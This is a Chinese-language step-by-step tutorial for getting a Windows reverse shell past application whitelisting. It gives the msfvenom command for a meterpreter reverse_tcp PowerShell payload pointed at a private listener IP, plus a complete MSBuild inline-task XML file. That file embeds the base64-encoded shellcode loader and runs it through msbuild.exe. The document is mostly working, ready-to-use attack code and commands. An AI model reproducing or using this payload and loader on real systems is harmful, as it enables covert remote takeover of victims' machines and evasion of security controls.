1、msfvenom生成shellcode,注意?成的是psh格式
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2lport=3333 -f psh -o shell.ps1
2、打开生成 shell.ps1 ?件,在?件最后添加
for (;;){
Start-sleep 60
}
保存一下
3、将修改后的 shell.ps1 ?件内容进?base64编码
可以使?在线平台(?如:https://www.sojson.com/base64.html )也可以使?其他编码?具。
4、把编码后的内容替换到下?代码中 cmd = 处,并保存为 shell.xml
<Project ToolsVersion="4.0"
xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><!-- This inline task executes c# code. --><!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe nps.xml --><!-- Original MSBuild Author: Casey Smith, Twitter: @subTee --><!-- NPS Created By: Ben Ten, Twitter: @ben0xa --><!-- License: BSD 3-Clause --><Target Name="npscsharp"><nps /></Target><UsingTaskTaskName="nps"TaskFactory="CodeTaskFactory"AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" ><Task><Reference Include="System.Management.Automation" /><Code Type="Class" Language="cs"><![CDATA[using System;using System.Collections.ObjectModel;using System.Management.Automation;using System.Management.Automation.Runspaces;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class nps : Task, ITask{
public override bool Execute(){
string cmd =
"JEJGd2JBZ1RQID0gQCIKW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildCnB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2MoSW50 UHRyIGxwQWRkcmVzcywgdWludCBkd1NpemUsIHVpbnQgZmxBbGxvY2F0aW9uVHlwZSwgdWludCBmbFByb3RlY3QpOwpbRGxsSW1wb3J0KCJrZXJuZWwzM i5kbGwiKV0KcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIENyZWF0ZVRocmVhZChJbnRQdHIgbHBUaHJlYWRBdHRyaWJ1dGVzLCB1aW50IGR3U3RhY2 tTaXplLCBJbnRQdHIgbHBTdGFydEFkZHJlc3MsIEludFB0ciBscFBhcmFtZXRlciwgdWludCBkd0NyZWF0aW9uRmxhZ3MsIEludFB0ciBscFRocmVhZEl kKTsKIkAKCiRBWHJmcEp5c2NoZCA9IEFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICRCRndiQWdUUCAtTmFtZSAiV2luMzIiIC1uYW1lc3BhY2UgV2lu MzJGdW5jdGlvbnMgLXBhc3N0aHJ1CgpbQnl0ZVtdXSAkeFJYT0RmR28gPSAweGZjLDB4ZTgsMHg4ZiwweDAsMHgwLDB4MCwweDYwLDB4ODksMHhlNSwwe DMxLDB4ZDIsMHg2NCwweDhiLDB4NTIsMHgzMCwweDhiLDB4NTIsMHhjLDB4OGIsMHg1MiwweDE0LDB4ZiwweGI3LDB4NGEsMHgyNiwweDhiLDB4NzIsMH gyOCwweDMxLDB4ZmYsMHgzMSwweGMwLDB4YWMsMHgzYywweDYxLDB4N2MsMHgyLDB4MmMsMHgyMCwweGMxLDB4Y2YsMHhkLDB4MSwweGM3LDB4NDksMHg 3NSwweGVmLDB4NTIsMHg1NywweDhiLDB4NTIsMHgxMCwweDhiLDB4NDIsMHgzYywweDEsMHhkMCwweDhiLDB4NDAsMHg3OCwweDg1LDB4YzAsMHg3NCww eDRjLDB4MSwweGQwLDB4OGIsMHg1OCwweDIwLDB4NTAsMHgxLDB4ZDMsMHg4YiwweDQ4LDB4MTgsMHg4NSwweGM5LDB4NzQsMHgzYywweDMxLDB4ZmYsM Hg0OSwweDhiLDB4MzQsMHg4YiwweDEsMHhkNiwweDMxLDB4YzAsMHhjMSwweGNmLDB4ZCwweGFjLDB4MSwweGM3LDB4MzgsMHhlMCwweDc1LDB4ZjQsMH gzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTAsMHg1OCwweDhiLDB4NTgsMHgyNCwweDEsMHhkMywweDY2LDB4OGIsMHhjLDB4NGIsMHg 4YiwweDU4LDB4MWMsMHgxLDB4ZDMsMHg4YiwweDQsMHg4YiwweDEsMHhkMCwweDg5LDB4NDQsMHgyNCwweDI0LDB4NWIsMHg1YiwweDYxLDB4NTksMHg1 YSwweDUxLDB4ZmYsMHhlMCwweDU4LDB4NWYsMHg1YSwweDhiLDB4MTIsMHhlOSwweDgwLDB4ZmYsMHhmZiwweGZmLDB4NWQsMHg2OCwweDMzLDB4MzIsM HgwLDB4MCwweDY4LDB4NzcsMHg3MywweDMyLDB4NWYsMHg1NCwweDY4LDB4NGMsMHg3NywweDI2LDB4NywweDg5LDB4ZTgsMHhmZiwweGQwLDB4YjgsMH g5MCwweDEsMHgwLDB4MCwweDI5LDB4YzQsMHg1NCwweDUwLDB4NjgsMHgyOSwweDgwLDB4NmIsMHgwLDB4ZmYsMHhkNSwweDZhLDB4YSwweDY4LDB4Mjc sMHg2OCwweDM4LDB4OGMsMHg2OCwweDIsMHgwLDB4MWIsMHhiYywweDg5LDB4ZTYsMHg1MCwweDUwLDB4NTAsMHg1MCwweDQwLDB4NTAsMHg0MCwweDUw LDB4NjgsMHhlYSwweGYsMHhkZiwweGUwLDB4ZmYsMHhkNSwweDk3LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDk5LDB4YTUsMHg3NCwweDYxLDB4Z mYsMHhkNSwweDg1LDB4YzAsMHg3NCwweGEsMHhmZiwweDRlLDB4OCwweDc1LDB4ZWMsMHhlOCwweDY3LDB4MCwweDAsMHgwLDB4NmEsMHgwLDB4NmEsMH g0LDB4NTYsMHg1NywweDY4LDB4MiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHg4MywweGY4LDB4MCwweDdlLDB4MzYsMHg4YiwweDM2LDB4NmEsMHg 0MCwweDY4LDB4MCwweDEwLDB4MCwweDAsMHg1NiwweDZhLDB4MCwweDY4LDB4NTgsMHhhNCwweDUzLDB4ZTUsMHhmZiwweGQ1LDB4OTMsMHg1MywweDZh LDB4MCwweDU2LDB4NTMsMHg1NywweDY4LDB4MiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHg4MywweGY4LDB4MCwweDdkLDB4MjgsMHg1OCwweDY4L DB4MCwweDQwLDB4MCwweDAsMHg2YSwweDAsMHg1MCwweDY4LDB4YiwweDJmLDB4ZiwweDMwLDB4ZmYsMHhkNSwweDU3LDB4NjgsMHg3NSwweDZlLDB4NG QsMHg2MSwweGZmLDB4ZDUsMHg1ZSwweDVlLDB4ZmYsMHhjLDB4MjQsMHhmLDB4ODUsMHg3MCwweGZmLDB4ZmYsMHhmZiwweGU5LDB4OWIsMHhmZiwweGZ mLDB4ZmYsMHgxLDB4YzMsMHgyOSwweGM2LDB4NzUsMHhjMSwweGMzLDB4YmIsMHhmMCwweGI1LDB4YTIsMHg1NiwweDZhLDB4MCwweDUzLDB4ZmYsMHhk NQoKCiRjUFBFVFdMS2hXREpCQSA9ICRBWHJmcEp5c2NoZDo6VmlydHVhbEFsbG9jKDAsW01hdGhdOjpNYXgoJHhSWE9EZkdvLkxlbmd0aCwweDEwMDApL DB4MzAwMCwweDQwKQoKW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6Q29weSgkeFJYT0RmR28sMCwkY1BQRVRXTEtoV0RKQk EsJHhSWE9EZkdvLkxlbmd0aCkKCiRBWHJmcEp5c2NoZDo6Q3JlYXRlVGhyZWFkKDAsMCwkY1BQRVRXTEtoV0RKQkEsMCwwLDApCgpmb3IgKDs7KXsKICA gU3RhcnQtc2xlZXAgNjAKfQ==";PowerShell ps = PowerShell.Create();ps.AddScript(Base64Decode(cmd));Collection<PSObject> output = null;try{
output = ps.Invoke();}catch(Exception e){
Console.WriteLine("Error while executing the script.\r\n" + e.Message.ToString());}if (output != null){
foreach (PSObject rtnItem in output){
Console.WriteLine(rtnItem.ToString());}}return true;}public static string Base64Encode(string text) {
return
System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));}public static string Base64Decode(string encodedtext) {
return
System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));}}]]></Code></Task></UsingTask>
</Project>
5、msf设置监听
6、cmd下命令执行
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe shell.xml